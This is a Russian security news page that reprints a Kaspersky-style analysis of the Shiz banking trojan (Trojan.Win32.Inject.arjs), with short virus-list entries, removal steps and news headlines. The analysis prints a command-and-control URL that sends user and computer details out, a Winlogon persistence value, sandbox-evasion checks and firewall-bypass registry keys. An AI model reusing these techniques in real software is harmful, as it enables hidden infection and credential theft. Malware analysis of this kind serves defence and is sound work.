Вирусы
02 августа 2012
Trojan-Downloader.Win32.Small.bsuj

Троянская программа, которая без ведома пользователя загружает из сети Интернет другие вредоносные программы и запускает их на выполнение. Является приложением Windows (PE-EXE файл). Имеет размер 3136 байт. Написана на C++.

02 августа 2012
Trojan-Downloader.Win32.Small.bsum

Троянская программа, которая без ведома пользователя загружает из сети Интернет другие вредоносные программы и запускает их на выполнение. Является приложением Windows (PE-EXE файл). Имеет размер 3136 байт. Написана на C++.

27 июля 2012
Trojan-Downloader.Win32.Agent.djuz

Троянская программа, которая без ведома пользователя устанавливает в системе другое вредоносное ПО. Является приложением Windows (PE-EXE файл). Имеет размер 10240 байт. Написана на С++.

27 июля 2012
Trojan-Downloader.Java.Agent.kf

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является Java-классом (class-файл). Имеет размер 3775 байт.

25 июля 2012
Trojan-Downloader.Java.Agent.lc

Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обеспечение и запускает его на исполнение. Является Java-классом (class-файл). Имеет размер 3458 байт.

 
 
Рамблер

 
Яндекс.Погода
 
   Партнеры:
к списку всех партнеров
 
05 августа 2010 | Trojan.Win32.Inject.arjs

Технические детали

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE-EXE файл). Имеет размер 103936 байт. Упакована неизвестным упаковщиком. Написана на C++.

Инсталляция

При запуске троянец копирует свой исполняемый файл в системный каталог Windows под следующим именем:

%System%/rnd.exe

Где rnd – случайная последовательность из 7 цифр или букв латинского алфавита.

Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:

[HKLM/Software/Microsoft/Windows NT/CurrentVersion/Winlogon]
"Userinit"=" C:/Windows/system32/userinit.exe,//?/globalroot/systemroot/system32/rnd.exe,"

Деструктивная активность

Троянец завершает свое выполнение при обнаружении в своем адресном пространстве библиотеки с именем:

sbiedll.dll

а также при наличии на компьютере пользователя файла:

%System%/drivers/vmhgfs.sys

Таким образом вредонос противодействует технологиям автоматического анализа программ для обнаружения их вредоносной активности.

Троянец запускает свою копию и завершает работу.

Копия троянца выполняет следующие действия:

  • проверяет наличие строки "С:/sand-box/" в пути к своему оригинальному файлу. Если строка найдена, то троянец завершает свою работу и удаляет свой исполняемый файл.
  • проверяет наличие установленных антивирусов на зараженном компьютере путем поиска окон с именем класса "____AVP.Root" для Антивируса Касперского, проверки наличия файла с именем "%system%/drivers/avgtdix.sys" для AVG Anti-virus, ключа системного реестра "HKLM/Software/Avira/AntiVir PersonalEdition Classic/" для Avira AntiVir и именованного канала "////.//pipe//acsipc_server" для Agnitum Outpost.
  • пытается остановить или помешать работе найденных антивирусов.
  • ищет системный процесс "services.exe" и внедряет в его адресное пространство код библиотеки, которая содержится в теле данной троянской программы и детектируется Антивирусом Касперского как Trojan-Spy.Win32.Shiz.cj.

После этого троянец завершает свою работу.

Вредоносная библиотека, внедренная в процесс "services.exe", выполняет следующие действия:

  1. Создает поток, в котором в бесконечном цикле устанавливает функции-перехватчики на следующие API-функции:
  2. getaddrinfo
    gethostbyname
    inet_addr
    CryptEncrypt
    CreateFileW
    GetFileAttributesExW
    send
    WSASend
    RCN_R50Buffer
    GetWindowText

    Что позволяет вредоносу следить и анализировать сетевой трафик, шифруемые данные и создаваемые файлы.

  3. Отправляет запрос на следующий ресурс:
  4. http://brandavion.com/knok.php?id=имя пользователя!имя компьютера пользователя!метка тома и серийный номер&ver=10&up=89811&os=сведения об операционной системе

    В ответ получает URL для загрузки файла, файл сохраняется во временном каталоге текущего пользователя Windows со случайным именем:

    %Temp%/rnd.tmp

    Где rnd - случайный набор цифр и латинских букв, например, "6D5".

    На момент создания описания ресурс был недоступен.

    Также троянец может получать команды для дальнейшей своей работы в виде параметра для ключа системного реестра:

    [HKLM/Software/Microsoft]

    Таким образом в зависимости от имени параметра ключа реестра вредонос может:

    • загружать по полученному от злоумышленник URL и запускать на исполнение файл, который сохраняется под следующим именем:
    • С:/temp_file_bin

    • удалять файлы и каталоги
    • выполнять рекурсивное удаление всех файлов и каталогов на всех доступных логических дисках компьютера пользователя, после чего завершать процессы:
    • smss.exe
      csrss.exe
      lsass.exe
      winlogon.exe

  5. Внедряет вредоносный код в следующие процессы:
  6. iexplore.exe
    opera.exe
    java.exe
    javaw.exe
    explorer.exe
    isclient.exe
    intpro.exe
    mnp.exe
    loadmain.exe

    код устанавливает перехватчик API-функции "HttpSendRequest", выполняющий функционал кейлоггера. Собранные данные о посещенных сайтах и нажатых клавишах сохраняются в следующем файле:

    %ProgramFiles%/Common Files/keylog.txt

  7. Проверяет наличие установленных антивирусов и пытается завершить или помешать их работе.
  8. Добавляет запись в таблицу сетевых маршрутов (тем самым блокируя доступ к ресурсам), выполнив команды:
  9. route.exe -p add IP адрес1 mask <маска подсети> IP адрес2

    Где IP адрес2 - IP адрес компьютера пользователя;

    IP адрес1 - IP адрес блокируемых вредоносом ресурсов. Вредонос блокировал доступ к следующим IP адресам

    :

    74.55.143.0
    62.67.184.0
    208.43.44.0
    188.40.74.0
    212.59.118.0
    81.176.67.0
    87.242.75.0
    83.102.130.0
    207.44.254.0
    75.125.212.0
    74.86.125.0
    75.125.43.0
    75.125.189.0
    74.54.46.0
    74.54.130.0
    174.120.184.0
    174.120.185.0
    174.133.38.0
    74.54.139.0
    74.86.232.0
    74.53.70.0
    208.43.71.0
    174.120.186.0
    75.125.185.0
    74.55.74.0
    95.140.225.0
    94.236.0.0
    94.23.206.0
    93.191.13.0
    93.184.71.0
    92.53.106.0
    92.123.155.0
    91.209.196.0
    91.199.212.0
    91.121.97.0
    90.183.101.0
    90.156.159.0
    89.202.157.0
    89.202.149.0
    89.111.176.0
    89.108.66.0
    88.221.119.0
    87.242.79.0
    87.242.74.0
    87.242.72.0
    87.238.48.0
    87.230.79.0
    87.106.254.0
    87.106.242.0
    85.31.222.0
    85.255.19.0
    85.214.106.0
    85.17.210.0
    85.12.57.0
    84.40.30.0
    83.223.117.0
    83.222.31.0
    83.222.23.0
    83.202.175.0
    82.98.86.0
    82.165.103.0
    82.151.107.0
    82.117.238.0
    81.24.35.0
    81.177.31.0
    81.176.66.0
    80.86.107.0
    80.237.132.0
    80.190.154.0
    80.190.130.0
    80.153.193.0
    79.125.5.0
    78.47.87.0
    78.137.164.0
    78.108.86.0
    75.125.82.0
    75.125.29.0
    74.55.40.0
    74.53.201.0
    74.52.233.0
    74.50.0.0
    74.208.20.0
    74.208.158.0
    74.125.77.0
    72.32.70.0
    72.32.149.0
    72.32.125.0
    72.3.254.0
    72.232.246.0
    70.84.211.0
    69.93.226.0
    69.57.142.0
    69.20.104.0
    69.18.148.0
    69.162.79.0
    68.177.102.0
    67.227.172.0
    67.225.206.0
    67.192.135.0
    67.19.34.0
    67.15.231.0
    67.15.103.0
    67.134.208.0
    66.77.70.0
    66.249.17.0
    66.223.50.0
    65.55.240.0
    65.55.184.0
    65.175.38.0
    64.78.182.0
    64.66.190.0
    64.41.151.0
    64.41.142.0
    64.246.4.0
    64.202.189.0
    64.13.134.0
    64.128.133.0
    63.85.36.0
    62.75.216.0
    62.75.163.0
    62.213.110.0
    62.189.194.0
    62.146.66.0
    62.146.210.0
    62.14.249.0
    38.113.1.0
    217.174.103.0
    217.170.21.0
    217.16.16.0
    217.106.234.0
    216.99.133.0
    216.55.183.0
    216.49.94.0
    216.49.88.0
    216.246.90.0
    216.239.122.0
    216.12.145.0
    216.10.192.0
    213.31.172.0
    213.220.100.0
    213.198.89.0
    213.171.218.0
    213.133.34.0
    212.8.79.0
    212.72.62.0
    212.67.88.0
    212.47.219.0
    209.87.209.0
    209.62.68.0
    209.62.112.0
    209.51.167.0
    209.216.46.0
    209.160.22.0
    209.157.69.0
    209.124.55.0
    208.79.250.0
    207.66.0.0
    207.46.232.0
    207.46.20.0
    207.46.18.0
    207.44.154.0
    206.204.52.0
    205.227.136.0
    205.178.145.0
    204.14.90.0
    203.160.188.0
    199.203.243.0
    198.6.49.0
    195.70.37.0
    195.64.225.0
    195.55.72.0
    195.210.42.0
    195.2.240.0
    195.146.235.0
    195.137.160.0
    194.33.180.0
    194.206.126.0
    194.112.106.0
    194.109.142.0
    194.0.200.0
    193.71.68.0
    193.69.114.0
    193.66.251.0
    193.24.237.0
    193.193.194.0
    193.17.85.0
    193.110.109.0
    193.1.193.0
    193.0.6.0
    192.150.94.0
    188.93.8.0
    18.85.2.0
    166.70.98.0
    165.160.15.0
    162.40.10.0
    155.35.248.0
    150.70.93.0
    149.101.225.0
    141.202.248.0
    139.91.222.0
    128.130.60.0
    128.130.56.0
    128.111.48.0

  10. Получает ресурсы и сохраненные пароли к ним, анализируя файлы настроек браузеров.
  11. Ворует банковские реквизиты пользователей следующих систем онлайн банкинга:
  12. Inter-PRO Client
    РФК Клиент-Web
    FAKTURA.ru
    RAIFFEISEN
    WebMoney Keeper

  13. Для обхода встроенного брандмауэра Windows XP (Windows Firewall) создает ключи системного реестра:
  14. [HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/AuthorizedApplications/List]
    "%System%/services.exe" = "%System%/services.exe :*:Enabled:svchost"

    [HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List]
    "rnd2:TCP" = "rnd2:TCP:*:Enabled:services.exe"

    Где rnd2 - случайное число.

    Создает на зараженной системе SOCKS-прокси сервер на случайном TCP порте, с помощью которого отсылает злоумышленнику собранные данные:

    http://******avion.com/socks.php

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить копию троянской программы:
  3. %System%/rnd.exe

  4. Удалить файлы:
  5. С:/temp_file_bin
    %ProgramFiles%/Common Files/keylog.txt

  6. Изменить значение ключа системного реестра на:
  7. [HKLM/Software/Microsoft/Windows NT/CurrentVersion/Winlogon]
    "Userinit"=" C:/Windows/system32/userinit.exe,"

  8. Для очистки таблицы маршрутов от записей для всех шлюзов выполнить команду в командной строке:
  9. route.exe -f

  10. Удалить ключи системного реестра:
  11. [HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/AuthorizedApplications/List]
    "%System%/services.exe" = "%System%/services.exe :*:Enabled:svchost"

    [HKLM/System/CurrentControlSet/Services/SharedAccess/Parameters/FirewallPolicy/StandardProfile/GloballyOpenPorts/List]
    ":TCP" = ":TCP:*:Enabled:services.exe"

  12. Очистить каталог Temporary Internet Files.
  13. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

Источник: securelist.com.

   Новости
17 сентября 2015 | Trend Micro: Китайские хакеры похитили «терабайты» данных у государственных и технокомпаний.

Хакеры занимались хищением интеллектуальной собственности и стратегически важных документов.

Согласно отчету ИБ-компании Trend Micro, берущая начало еще в 2010 году шпионская кампания, в рамках которой хакеры похищали данные государственных учреждений в Китае, на Филиппинах и Тибете, в 2013 году переключилась на технологические предприятия в США.

17 сентября 2015 | F-Secure: Российские хакеры в течение семи лет шпионили за правительственными организациями.

Хакеры использовали вредонос Dukes с целью хищения конфиденциальной информации.

11 сентября 2015 | Обнаружено первое вредоносное ПО для Android, изменяющее PIN-код.

Вредонос получает права администратора, деактивировать которые невозможно.

11 сентября 2015 | Способный обходить CAPTCHA троян для Android распространяется через Google Play.

Троян обходит CAPTCHA через перенаправление запросов на online-сервис Antigate.com.

03 сентября 2015 | Эксперт: Windows показывает неполный список всех доверенных корневых сертификатов.

Windows не предоставляет графический интерфейс для просмотра полного списка.

03 сентября 2015 | Миллионы домашних маршрутизаторов подвержены уязвимости Filet-O-Firewall.

Злоумышленники могут полностью скомпрометировать домашние сети миллионов пользователей.

Как следует из бюллетеня безопасности, размещенного на сайте CERT/CC, миллионы домашних маршрутизаторов могут быть подвержены уязвимости Fillet-o-Firewall.

24 августа 2015 | «Анонимный интернационал» опубликовал очередную порцию документов Минобороны РФ.

Хакеры опубликовали документы в доказательство некомпетентности сотрудников министерства в области безопасности данных.

Активисты из хакерской группировки «Анонимный интернационал», также известной как «Шалтай-Болтай», опубликовали очередную порцию документов, полученных в результате взлома электронной почты Ксении Большаковой, помощника и секретаря бывшего руководителя Департамента строительства Минобороны РФ Романа Филимонова.

24 августа 2015 | Google и Internet Explorer попали в федеральный список экстремистских материалов.

В перечень экстремистских материалов также попали «android_update» и «Kaspersky_antivirus».

Google, кэш «Яндекса» и Internet Explorer попали в федеральный список экстремистских материалов, размещенный на сайте Министерства юстиции России.

18 августа 2015 | Неудаляемые супер cookie-файлы продолжают использовать по всему миру

На данный момент только компания AT&T прекратила использование супер cookie-файлов.

По данным нового исследования, проведенного компанией по защите цифровых прав Access, как минимум 9 телекоммуникационных компаний по всему миру используют так называемые супер cookie-файлы для ведения контроля за online-действиями граждан.

18 августа 2015 | Windows 10 отправляет данные Microsoft даже в случае отключения определенных функций.

ОС отправляет данные на серверы Microsoft, даже если деактивировать Cortana и поиск в интернете.

Как сообщают эксперты издания ARS Technica, Windows 10 отсылает информацию пользователей на серверы Microsoft даже в случае отключения функций, связанных со сбором и хранением персональных данных.

 

 

     
Новости | Вирусы | Уязвимости | Статьи | Партнеры | Форум | Контакты
Rambler's Top100 Яндекс цитирования Каталог HeadNet.Ru Faststart - рейтинг сайтов, каталог интернет ресурсов, счетчик посещаемости Catalyse.ru Рейтинг@Mail.ru